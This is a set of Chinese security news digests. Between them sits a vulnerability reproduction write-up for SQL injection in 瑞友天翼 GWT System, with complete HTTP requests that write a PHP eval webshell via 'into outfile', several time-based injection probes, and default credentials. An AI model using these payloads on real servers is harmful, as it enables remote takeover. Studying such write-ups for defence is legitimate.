1、安全厂商发现窃密软件ViperSoftX新变种 https://www.trendmicro.com/en_us/research/23/d/vipersoftx-updates-encryption-steals-data.html ViperSoftX是一种信息窃取软件，据报道主要针对加密货币，因其在日志文件中隐藏恶意代码的执行技术而成为2022年的头条新闻。研究人员观察到ViperSoftX近期进行了版本更新，逃避了初始加载程序检测，并通过破解、密钥生成、激活程序和非恶意打包程序使初始包加载程序变得更加具有欺骗性。此外还观察到更复杂的加密和基本的反分析技术。 2、APC警告UPS软件中存在严重RCE漏洞 https://www.bleepingcomputer.com/news/security/apc-warns-of-critical-unauthenticated-rce-flaws-in-ups-software/ APC（施耐德电气旗下）是最受欢迎的UPS品牌之一。其产品广泛应用于消费者和企业市场，包括政府、医疗保健、工业、IT 和零售基础设施。本月早些时候，该供应商发布了一份安全通知 ，警告有三个影响其产品的漏洞，这些漏洞会导致APC的Easy UPS在线监控软件容易受到未经身份验证的任意远程代码执行攻击，允许黑客接管设备，在最坏的情况下，甚至会完全禁用其功能。 3、SolarWinds平台修补了两个高危漏洞 https://www.securityweek.com/solarwinds-platform-update-patches-high-severity-vulnerabilities/ SolarWinds平台最近修补的两个高危漏洞，其中最严重的是CVE-2022-36963（CVSS 得分为 8.8），被描述为SolarWinds基础设施监控和管理解决方案中的命令注入错误，该漏洞可以被远程利用来执行任意命令，成功利用此漏洞需要攻击者拥有有效SolarWinds Platform 管理员帐户的凭据。第二个漏洞跟踪为CVE-2022-47505（CVSS 得分为 7.8），被描述为本地权限 4、SLP(服务定位协议)漏洞可被用于DDoS放大攻击，倍数高达2200倍 https://securityaffairs.com/145295/hacking/slp-flaw-ddos-attacks.html 影响服务定位协议 ( SLP)的高危安全漏洞（CVE-2023-29552，CVSS 评分：8.6）可被威胁行为者利用以进行反射型 DDoS 放大攻击。该漏洞可实现高达2200倍的放大倍数，是有史以来最大的放大攻击之一。 该漏洞影响全球 2,000 多个组织和 54,000 多个公开暴露在 Internet 上的 SLP 实例，包括 VMWare ESXi Hypervisor、Konica Minolta 打印机、Planex 路由器、IBM 集成管理 5、VMware 解决了 Pwn2Own Vancouver 2023 上展示的两个零日漏洞 https://securityaffairs.com/145287/security/vmware-fixes-critical-zero-days-pwn2own.html VMware 发布了安全更新，以解决两个零日漏洞（CVE-2023-20869、CVE-2023-20870），这两个漏洞可以被链接起来以在Workstation和 Fusion 软件管理程序上实现任意代码执行。 6、一个新的 Mirai 僵尸网络变体以 TP-Link Archer A21 为目标 https://securityaffairs.com/145278/hacking/mirai-botnet-cve-2023-1389-tp-link-archer-a21.html Mirai 僵尸网络在最近的攻击中开始利用 TP-Link Archer A21 中的CVE-2023-1389 漏洞（又名ZDI-CAN-19557/ZDI-23-451 ），CVE-2023-1389 漏洞是一个未经身份验证的命令注入漏洞，存在于 TP-Link Archer AX21 路由器的 Web 管理界面的语言环境 API 中。 7、谷歌研究人员在英特尔 TDX 中发现了多个安全问题 https://securityaffairs.com/145268/security/intel-tdx-flaws.html 谷歌云安全和Project Zero研究人员与英特尔专家合作，在英特尔信任域 扩展(TDX) 中发现了多个漏洞。 8、汽车品牌标致泄露了南美国家秘鲁的用户数据 https://securityaffairs.com/145253/security/peugeot-leaks-access-to-user-information-in-south-america.html Stellantis旗下的法国汽车品牌Peugeot泄露了其在秘鲁的用户数据。 9、谷歌云推出 Security AI Workbench 以加快威胁检测和分析速度 https://thehackernews.com/2023/04/google-cloud-introduces-security-ai.html 谷歌的云部门推出了Security AI Workbench，该工作台利用生成式 AI 模型来更好地了解威胁态势。为网络安全套件提供支持的是 Sec-PaLM，这是一种专门的大型语言模型 ( LLM )。 10、新型瞬态执行侧信道攻击能从英特尔处理器中窃取数据 https://www.freebuf.com/news/364747.html ，近日在 Arxiv.org 上发表的一篇技术论文揭示了一种针对多代英特尔CPU的攻击手法——利用新的侧信道攻击，让数据通过 EFLAGS 寄存器泄露。这一与众不同的侧信道攻击由清华大学、马里兰大学和中国教育部计算机实验室 (BUPT) 的研究人员共同发现，它不像许多其他侧信道攻击那样依赖缓存系统，而是利用瞬态执行中 EFLAGS 寄存器变化的缺陷，影响JCC（条件代码跳转）指令的时序，进而通过时序分析从用户内存空间中提取数据。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

漏洞简介 　　微步在线漏洞团队通过“X漏洞奖励计划”获取到瑞友天翼应用虚拟化系统远程代码执行漏洞情报(0day)，攻击者可以通过该漏洞执行任意代码，导致系统被攻击与控制。瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台，它将用户各种应用软件集中部署到瑞友天翼服务集群，客户端通过WEB即可访问经服务器上授权的应用软件，实现集中应用、远程接入、协同办公等。 　　漏洞是因为未授权接口在接收参数时没有进行处理校验，存在 SQL 注入漏洞，又因为集成环境中的 mysql 拥有写入文件的权限，所以写入 webshell 最终导致代码执行。 影响版本 　　5.x <= 瑞友天翼应用虚拟化系统（GWT System） <= 7.0.2.         目前相关漏洞已修复。 环境搭建 　　从师傅处拷到的安装包 Gwt7.0.2.1.exe 默认模式安装，最后 　　 　　 　　在线注册获取试用 http://mop.realor.cn/TrialReg.aspx 　　 注册成功后 　　 登录页面 默认账号密码是 Admin/123 　　 　　默认路径在 C:/Program Files (x86)/RealFriend/Rap Server/WebRoot 　　 　　默认数据库配置地址 C:\Program Files (x86)\RealFriend\Rap Server\data\Config\CasDbCnn.dat 　　 　　账号密码需要将其中的 # 替换为 = 并进行 base64 解码 漏洞复现与分析 　　通过 http://192.168.222.148/RAPAgent.XGI?CMD=GetRegInfo 查看版本信息 　　 　　为了方便查看后端实际执行的完整sql，我们可以使用框架提供的 getLastSql() 方法来 获取最近一次执行的SQL语句 　　 注入一IndexController.class.phpdologin 　　 webroot/casweb/Home/Controller/IndexController.class.php:dologin 　　 我们看到其中的 SQL 语句以及对该函数的请求路由 　　 http://www.casweb.cn.x/index.php?s=/Index/dologin/name/admin/pwd/c4ca4238a0b923820dcc509a6f75849b 　　构造数据包 并打印出相对应的 sql 语句 　　 因为默认没有开启验证码，所以可以直接到达 SQL 语句处 　　因为搭建环境时，使用了集成好的mysql 环境，拥有 DBA 的权限，所以可以在文件夹任意位置写入内容 show global variables like '%secure%'; 　　 　　secure_file_priv='' #允许写入到任何文件夹 　　利用报错信息得到项目的绝对路径 　　 构造payload POST /index.php?s=/Index/dologin/name HTTP/1.1 Host: 192.168.222.148 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 name=1')+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, '<?php eval($_REQUEST["cmd"]);?>' into outfile 'C:/Program Files (x86)/RealFriend/Rap Server/WebRoot/dologin.php'# 　　 　　 查询管理员用户的账户和密码 　　 注入二__ConsoleExternalUploadApi.XGI 　　 webroot/ConsoleExternalUploadApi.XGI 　　 获取到三个参数，当三个参数都不为空时，调用 getfarminfo 来进行处理 　　 webroot/Function.XGI 　　 　　 webroot/Common.XGI 　　 对 key 值没有做任何校验，所以可以构造 payload 实现注入 POST /ConsoleExternalUploadApi.XGI HTTP/1.1 Host: 192.168.222.148 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 46 Content-Type: application/x-www-form-urlencoded initParams=1&sign=2&key=FarmName'and sleep(5)# 　　修改了代码 打印出了 SQL 命令 　　 构造实现注入写入文件 POST /ConsoleExternalUploadApi.XGI HTTP/1.1 Host: 192.168.222.148 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 170 Content-Type: application/x-www-form-urlencoded initParams=1&sign=1&key=1'union select '<?php eval($_REQUEST["cmd"]);?>' into outfile 'C:/Program Files (x86)/RealFriend/Rap Server/WebRoot/ConsoleExternalUploadApi.php'# 　　 　　 　　 注入三ConsoleExternalUploadApi.XGIuploadAuthorizeKeyFile POST /ConsoleExternalUploadApi.XGI HTTP/1.1 Host: 192.168.222.148 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 122 initParams=command_uploadAuthorizeKeyFile__user_admin'and+sleep(5)#__pwd_1&key=inner&sign=d3adb9869bd6a377fa452930d920fd10 　　 注入四ConsoleExternalApi.XGIcreateUser 　　‍ 　　之后的漏洞大抵上都可以描述为同一个漏洞，只是因为参数的不同，传入到不同的位置，在这里仅仅用一个来举例，之后的不再详细进行分析 　　我们从 ConsoleExternalApi.XGI 进行分析 　　 通过 REQUEST 方法获取到参数 　　 通过接下来的这段代码，我们可以得到如下结论，当 $key 的值为 inner 时，$keyVal 是一个固定值，$sign 的值是 md5($initparams . $keyVal); $initparams 中需要包含 __ 来分割数据，得到每个参数 　　 然后再通过 _ 分割 得到每个参数所对应的值 也就是当传入的值是 a_1__b_2 最后得到的也就是 a=1&b=2 　　继续向下分析 　　 当传入的 cmd 的值是 createUser 时，进入相对应的分支，构造相对应的语句就可以实现注入。 POST /ConsoleExternalApi.XGI?initParams=command_createUser__user_admin__pwd_1&key=inner&sign=bd58378906794858b1f57eb272e5d84f HTTP/1.1 Host: 192.168.222.148 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 46 Content-Type: application/json {"account":"1'or sleep(5)#", "userPwd":"1"} 　　 　　‍ 注入五 ConsoleExternalApi.XGIgetUserDetailByAccount POST /ConsoleExternalApi.XGI HTTP/1.1 Host: 192.168.222.148 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 132 initParams=command_getUserDetailByAccount__user_admin__account_1' or sleep(5) and '1&key=inner&sign=e24b8206a168347821a2f10aede99058

1、Black Basta勒索组织攻击加拿大出版商 https://www.bleepingcomputer.com/news/security/yellow-pages-canada-confirms-cyber-attack-as-black-basta-leaks-data/ 加拿大目录出版商Yellow Pages Group成立于1908年，拥有并运营YP.ca 和 YellowPages.ca网站，以及 Canada411 在线服务。其已经确认其遭受了网络攻击。Black Basta勒索组织声称对这次入侵活动负责，并在发布了敏感文件和数据。 2、二手企业网络设备因配置信息没有被删除可被利用进行网络攻击 https://www.bleepingcomputer.com/news/security/hackers-can-breach-networks-using-data-on-resold-corporate-routers/ 研究人员发现二手市场上的企业级网络设备隐藏了黑客可以用来破坏企业环境或获取客户信息的敏感数据。研究人员查看了几台使用过的企业级路由器，发现其中大部分被不当擦除然后在线销售。研究人员购买18台二手核心路由器，发现在一半以上工作正常的路由器上仍然可以访问完整的配置数据，这关于原所有者如何设置网络以及其他系统之间的连接的大量详细信息。其中只有五台被正确擦除，只有两台被加固 3、超700亿个敏感文件暴露在不安全的网络服务器上 https://www.helpnetsecurity.com/2023/04/24/critical-cybersecurity-exposures/ 研究人员通过检测发现，在所有检测到的面向互联网的资产中，几乎十分之一 (9%) 具有相关的未修补漏洞。前10个CVE被发现至少有 1200万次未打补丁。超过700亿个文件，包括知识产权和财务信息，在不安全的Web服务器上暴露，安全性无法保证。 4、GitHub 现在允许大规模启用私有漏洞报告 https://www.bleepingcomputer.com/news/security/github-now-allows-enabling-private-vulnerability-reporting-at-scale/ GitHub 宣布私有漏洞报告现已正式发布，并且可以在属于组织的所有存储库上大规模启用。 5、EvilExtractor恶意软件在欧洲和美国激增 https://www.bleepingcomputer.com/news/security/evilextractor-malware-activity-spikes-in-europe-and-the-us/ 研究人员发现，传播EvilExtractor数据盗窃工具的攻击有所增加，该工具用于在欧洲和美国窃取用户的敏感数据。 6、AuKill 工具使用 BYOVD 攻击禁用 EDR 软件 https://securityaffairs.com/145227/malware/aukill-tool-byovd-attack.html Sophos 研究人员报告说，威胁行为者正在使用以前未记录的防御规避工具（称为 AuKill）来禁用端点检测和响应 (EDR) 软件。AuKill 滥用Microsoft 实用程序 Process Explorer 16.32 版使用的过时版本的驱动程序来禁用 EDR 进程。 7、研究人员发布了利用 PaperCut 漏洞的 PoC 代码 https://securityaffairs.com/145215/hacking/papercut-poc-exploit-code.html 威胁参与者正在利用 PaperCut MF/NG 打印管理软件漏洞进行野外攻击，同时研究人员发布了 PoC 漏洞利用代码。 8、8220 Cryptojackers 团伙利用 Log4Shell 漏洞进行挖矿 https://cyware.com/news/8220-gang-of-cryptojackers-exploit-log4shell-to-mint-coins-dc4e6f17 研究人员发现 8220 Gang 利用 Log4Shell 漏洞在韩国能源相关公司的 VMware Horizon 服务器中安装了 CoinMiner。该团伙使用 PowerShell 脚本下载 ScrubCrypt 并通过对注册表项进行编辑来建立持久性。 9、朝鲜黑客使用新的“RustBucket”恶意软件瞄准 Mac 用户 https://www.securityweek.com/north-korean-hackers-target-mac-users-with-new-rustbucket-malware/ 该恶意软件被称为 RustBucket，能够从其命令和控制 (C&C) 服务器获取额外的有效负载，已归因于 APT 参与者 BlueNoroff，据信该组织是 Lazarus 黑客组织的一个子组。 10、Inea ICS 产品中的严重缺陷使工业组织面临远程攻击 https://www.securityweek.com/critical-flaw-in-inea-ics-product-exposes-industrial-organizations-to-remote-attacks 受影响的产品通过蜂窝网络在远程现场设备和控制中心之间提供数据接口。据 CISA 称，该产品在全球范围内用于能源、交通、水和废水等行业。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、X_Trader供应链攻击影响多国关键基础设施 https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain 赛门铁克团队发现X_Trader软件供应链攻击影响的组织比3CX还多，受害者中有两家能源行业的关键基础设施组织，一家在美国，另一家在欧洲，除此之外，另外两个涉及金融交易的组织也遭到破坏。木马化的X_Trader软件是上个月发现的3CX漏洞的原因，由此3CX的软件遭到破坏，许多客户无意中下载了该公司语音和视频通话软件DesktopApp的恶意版本。 2、Fakecalls恶意软件滥用合法签名密钥 https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fakecalls-android-malware-abusing-legitimate-signing-key/ McAfee Mobile Research Team发现了 一个Android银行木马程序，该木马程序使用韩国合法应用程序使用的密钥签名。按照设计，Android要求所有应用程序都必须使用密钥签名，这样才能安装或更新。Android银行木马就使用这个合法的签名密钥来绕过基于签名的检测技术。这一威胁已于去年披露给拥有合法密钥的公司，该公司已采取预防措施，确认已更换签名密钥。 3、思科修复解决方案中关键安全漏洞 https://securityaffairs.com/145108/security/industrial-network-director-and-modeling-labs-critical-flaws.html 思科发布了安全更新，以解决其Industrial Network Director 和 Modeling Labs解决方案中的关键安全漏洞。该漏洞跟踪为CVE-2023-20036（CVSS 评分：9.9），攻击者可以利用该漏洞在底层操作系统上以管理权限执行任意命令，并利用这些漏洞注入任意操作系统命令或访问敏感数据。研究发现此漏洞是由于应用于应用程序数据目录的默认文件权限不足 4、健康保险公司 Point32Health 遭受勒索软件攻击 https://securityaffairs.com/145183/cyber-crime/point32health-ransomware-attack.html 非营利性健康保险公司 Point32Health 遭受了勒索软件攻击，并已将系统关闭以应对这一事件。 5、CISA添加了3个漏洞到KEV目录，包括严重的 PaperCut 漏洞 https://thehackernews.com/2023/04/cisa-adds-3-actively-exploited-flaws-to.html 美国网络安全和基础设施安全局 (CISA) 周五根据主动利用的证据，在其已知利用漏洞 ( KEV ) 目录中添加了三个安全漏洞。三个漏洞如下CVE-2023-28432（CVSS 评分 - 7.5）- MinIO 信息泄露漏洞、CVE-2023-27350（CVSS 评分 - 9.8）- PaperCut MF/NG 不当访问控制漏洞、CVE-2023-2136（CVSS 评分 - 待定）- Google Chrome Skia 整数溢 6、黑客利用“明星塌房”、“私密视频”等噱头大肆传播病毒 https://www.freebuf.com/news/364486.html 近段时间以来，随着明星塌房事件密集曝出，有不法分子开始利用“明星塌房”来传播病毒，利用“独家爆料”、“私密视频”、“聊天记录”等噱头来吸引用户下载运行恶意软件。 7、美国国土安全部成立首个人工智能工作组 https://www.freebuf.com/news/364490.html 美国国土安全部（DHS）负责人宣布成立首个人工智能特别工作组，旨在保护国家免受人工智能技术尖端发展（如ChatGPT）造成的安全威胁。 8、与ChatGPT相关的恶意URL呈上升趋势 https://www.anquanke.com/post/id/288427 从2022年11月到2023年4月上旬，与ChatGPT相关的新注册和抢注域名数量每月增长910%。 9、威胁行为者使用 Mimikatz 黑客工具部署 Trigona 勒索软件 https://cybersecuritynews.com/mimikatz-hacking-tool-to-deploy-trigona-ransomware/ Palo Alto Networks 的 Unit42 研究团队最近发现了 Trigona 勒索软件，它使用不常见的技术攻击 Windows，并在尝试加密文件之前使用 Mimikatz 利用工具进行凭证加载、转储、操作和注入。 10、谷歌发布Assured OSS来检测开源组件漏洞 https://cybersecuritynews.com/google-released-assured-oss/ 谷歌云正在为 Java 和 Python 生态系统提供免费的 Assured Open Source Software (Assured OSS) 服务，以应对与依赖开源软件相关的日益严重的危险。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、Sophos NDR检测到新QakBot C2服务器 https://news.sophos.com/en-us/2023/04/20/new-qakbot-c2-servers-detected-with-sophos-ndr/ Sophos NDR利用一系列定期重新训练的机器学习模型来应对不断发展的恶意软件家族，这种方法允许Sophos NDR识别在网络深处秘密运行的新恶意软件变种。最近，Sophos NDR检测到两个尚未公开识别的新QakBot服务器。这些服务器被威胁行为者用来管理和控制QakBot感染。 2、攻击者使用旧版WordPress插件入侵网站 https://www.bleepingcomputer.com/news/security/attackers-use-abandoned-wordpress-plugin-to-backdoor-websites/ 攻击者正在使用Eval PHP（一种过时的合法WordPress插件）通过注入隐蔽的后门来破坏网站。Eval PHP是一个旧的WordPress插件，允许站点管理员将PHP代码嵌入到WordPress站点的页面和帖子中，然后在浏览器中打开页面时执行代码。据网站安全公司Sucuri称，使用Eval PHP将恶意代码嵌入看似无害的WordPress页面的趋势在 2023年4月激增 3、PaperCut修复打印管理系统漏洞 https://www.securityweek.com/papercut-warns-of-exploited-vulnerability-in-print-management-solutions/ Papercut 提供了一个称为PaperCut MF/NG的打印管理系统，提供监视和控制功能。该漏洞 CVE-2023-27350（CVSS 评分为 9.8）被描述为PaperCut MF/NG的SetupCompleted类中的不当访问控制问题。成功利用此安全缺陷允许未经身份验证的远程攻击者绕过身份验证并使用系统权限执行任意代码。该漏洞问题影响PaperCut MF 和 NG 8.0及更 4、研究人员发现利用K8s后门攻击集群活动 https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters 研究人员最近发现了有史以来第一个证据，表明攻击者在野利用 Kubernetes (K8s) 基于角色的访问控制 (RBAC) 创建后门。攻击者还部署了DaemonSets来接管和劫持他们攻击的K8s集群的资源。研究表明，该活动正在积极针对至少 60 个野外集群。 研究人员记录并分析了对一个K8s蜜罐的攻击，该蜜罐利用RBAC系统获得持久性。 5、Bumblebee通过木马化安装程序传播 https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads Bumblebee是一种模块化加载程序，过去主要通过网络钓鱼进行分发，用于交付通常与勒索软件部署相关的有效负载。CTU研究人员观察到Bumblebee恶意软件通过木马化安装程序分发，用于Zoom、Cisco AnyConnect、ChatGPT 和 Citrix Workspace 等流行软件。 6、美国多所大学Wiki网站遭到入侵 https://www.bleepingcomputer.com/news/security/university-websites-using-mediawiki-twiki-hacked-to-serve-fortnite-spam/ 研究人员观察到斯坦福大学、麻省理工学院、伯克利大学、麻省大学阿默斯特分校、东北大学、加州理工学院等大学托管的Wiki和文档页面遭到入侵。这些wiki页面是由垃圾邮件发送者上传的，它们引诱读者访问声称提供“免费礼品卡”、“堡垒之夜”和作弊等数字产品的虚假网站。 7、以ChatGPT为主题的诈骗攻击呈上升趋势 https://unit42.paloaltonetworks.com/chatgpt-scam-attacks-increasing/ 从2022年11月到2023年4月上旬，与 ChatGPT相关的域的每月注册量增加了910%。在同一时间范围内，我们从DNS安全日志中观察到相关抢注域名增长了17818%。此外每天检测到多达118个与ChatGPT相关的恶意URL，其中包含多个试图冒充OpenAI官方网站的网络钓鱼 URL。 8、美国律师协会 (ABA) 遭遇数据泄露，140 万会员受到影响 https://securityaffairs.com/145125/data-breach/american-bar-association-data-breach.html 美国律师协会 (ABA) 披露了一起数据泄露事件，威胁行为者获得了 1,466,000 名成员的旧凭据。 9、亲俄黑客对 EUROCONTROL 机构发起大规模攻击 https://securityaffairs.com/145114/hacktivism/pro-russia-hackers-ddos-eurocontrol.html 亲俄黑客组织 KillNet 对欧洲的空中交通机构 EUROCONTROL 发起了大规模的 DDoS 攻击。 10、谷歌云平台"GhostToken"漏断，能让恶意软件隐身 https://www.securityweek.com/google-cloud-platform-vulnerability-led-to-stealthy-account-backdoors/ Dark Reading 4 月 21 日消息，谷歌云平台 (GCP) 被曝存在一个安全漏洞，可能允许网络攻击者在受害者的谷歌帐户中隐藏不可删除的恶意应用程序。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、跨国 ICICI 银行泄露数百万条敏感数据，包括护照和信用卡等详细信息 https://securityaffairs.com/145094/uncategorized/icici-bank-data-leak.html ICICI 银行泄露了数百万条包含敏感数据的记录，ICICI Bank 是一家印度跨国公司，市值超过 760 亿美元，在印度拥有 5,000 多家分支机构，并在全球至少另外 15 个国家开展业务。泄露的数据包括银行账户详细信息、银行对账单、信用卡号码、全名、出生日期、家庭住址、电话号码、电子邮件、个人身份证件以及员工和候选人的简历。 2、VMware 修复了 vRealize 中允许以 root 身份执行任意代码的严重漏洞 https://securityaffairs.com/145087/security/critical-flaw-vmware-vrealize.html 虚拟化巨头 VMware 发布了安全更新以解决两个严重漏洞，跟踪为CVE-2023-20864 和 CVE-2023-20865，影响 VMware Aria Operations for Logs 产品（以前称为 vRealize Log Insight）。 3、Lazarus在最近攻击中使用新Linux 恶意软件，并与 3CX 供应链攻击有关 https://securityaffairs.com/145073/apt/lazarus-apt-linux-malware-3cx-attack.html APT 组织 Lazarus 在 Operation DreamJob（又名DeathNote或NukeSped）的活动中使用了新的 Linux 恶意软件。ESET 研究人员称对最近攻击的分析揭示了 Dream Job 活动中使用的工件与3CX 供应链攻击中使用的工件之间的相似之处。 4、研究人员披露阿里云数据库服务两大关键漏洞 https://securityaffairs.com/145061/hacking/brokensesame-alibaba-cloud-flaws.html 云安全公司 Wiz 的研究人员在阿里云的 ApsaraDB RDS for PostgreSQL 和 AnalyticDB for PostgreSQL 中发现了两个严重漏洞，统称为 BrokenSesame。这两个漏洞分别是AnalyticDB提权问题和ApsaraDB RDS远程代码执行漏洞。攻击者可以将这两个漏洞串联起来，从而导致对阿里巴巴数据库服务的 RCE。Wiz 于 2022 年 12 月向阿里云报告了这些漏洞，该公司于 5、Trigona 勒索软件以 Microsoft SQL 服务器为目标 https://securityaffairs.com/145036/cyber-crime/trigona-ransomware-targets-microsoft-sql-servers.html 威胁行为者正在入侵安全性差且暴露于内部的 Microsoft SQL 服务器以部署 Trigona 勒索软件。 6、Microsoft Defender 更新导致 Windows 硬件堆栈保护混乱 https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-update-causes-windows-hardware-stack-protection-mess/ 最近的 Microsoft Defender 更新推出了一项名为“内核模式硬件强制堆栈保护”的新安全功能，同时删除了 LSA 保护功能。 7、马斯克称：美国政府及情报机构可监视推特所有私聊信息 https://moguldom.com/442677/elon-musk-the-us-government-intelligence-agencies-had-access-to-twitter-backdoor-ability-to-spy-on-direct-messages/ 推特首席执行官埃隆·马斯克近日在采访中表示，他上任之前得知美国政府可以完全访问推特用户的私聊信息，这让他感到非常震惊。 8、2023网络安全成熟度报告：弱密码依旧排名第一 https://www.freebuf.com/articles/paper/364015.html 全球数字化给企业带来一个直观的安全风险是攻击面正在持续扩大。根据CrowdStrike Falcon Surface公开的数据显示，企业云环境中暴露的资产中有30%存在严重漏洞，针对企业的勒索攻击、APT攻击、数据泄露等安全事件越来越多，网络攻击方式也趋向复杂化、利益化。 9、Patchwork组织卷土重来，针对境内教育科研单位再次发起攻击行动 https://www.secrss.com/articles/53940 近期，深信服深瞻情报实验室联合深信服安服应急响应中心监测到APT组织对国内高校和科研单位的最新攻击动态，并结合深信服创新研究院混动图AI模型分析，将该样本归因为Patchwork组织发起的攻击。Patchwork组织， 又称摩诃草、白象、APT-Q-36、APT-C-09，是一个来自于南亚地区的境外APT组织。 10、欧盟网络安全战略最后一块拼图：《网络团结法案》提案发布 https://www.secrss.com/articles/53934 欧盟发布《网络团结法案》提案，要求投资超80亿元，建立欧盟安全运营中心“网络护盾”、欧盟网络民兵预备队，以应对大规模网络攻击。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、谷歌修补了 2023 年的第二个 Chrome 零日漏洞 https://www.securityweek.com/google-patches-second-chrome-zero-day-vulnerability-of-2023/ 该漏洞跟踪为 CVE-2023-2136，该安全缺陷被描述为 Skia 中的高严重性整数溢出问题。CVE-2023-2136 是 Chrome 今年解决的第二个零日漏洞，此前 CVE-2023-2033 是 V8 JavaScript 引擎中的类型混淆问题，上周已通过紧急补丁解决。 2、Oracle 2023 年 4 月的关键补丁更新包括 433 个新的安全补丁 https://www.securityweek.com/oracle-releases-433-new-security-patches-with-april-2023-cpu/ 甲骨文周二宣布发布 433 个新补丁作为其季度安全更新的一部分，其中包括 70 多个严重漏洞修复程序。超过 250 个已解决的漏洞可以在无需身份验证的情况下被远程利用。一些已解决的错误会影响多个产品。 3、美国和英国机构警告与俄罗斯有关的 APT28 利用老的思科路由器漏洞 https://securityaffairs.com/145007/apt/apt28-targets-cisco-networking-equipment.html 与俄罗斯有关的APT28组织利用未打补丁的思科路由器，以部署利用未打补丁的CVE-2017-6742 漏洞（CVSS 评分：8.8）的恶意软件。 4、伊朗黑客对美国基础设施进行报复性网络攻击 https://www.bleepingcomputer.com/news/security/microsoft-iranian-hackers-behind-retaliatory-cyberattacks-on-us-orgs/ 微软发现一个名为“Mint Sandstorm”的伊朗黑客组织正在对美国的关键基础设施进行网络攻击，据研究这是对近年伊朗遭到基础设施的攻击的报复行为。其中包括2021年6月对伊朗铁路系统的破坏攻击，以及2021年10月导致伊朗加油站停电的网络攻击 。微软认为，伊朗政府现在允许国家支持的威胁行为体在进行攻击时有更多的自由，从而导致网络攻击的整体增加。 5、安全公司发现基于Go语言的新型勒索软件CrossLock https://blog.cyble.com/2023/04/18/crosslock-ransomware-emerges-new-golang-based-malware-on-the-horizon/ 安全公司CRIL发现了一种使用“Go”编程语言创建的新型勒索软件CrossLock，该勒索软件针对企业要求支付大笔赎金。除了加密受害者的文件外，还采用双重勒索策略，威胁受害者如果不支付赎金，会将窃取的敏感数据发布在泄漏网站上。研究人员对CrossLock勒索软件进行了技术分析，并给出安全措施建议。 6、YouTube被利用分发Aurora 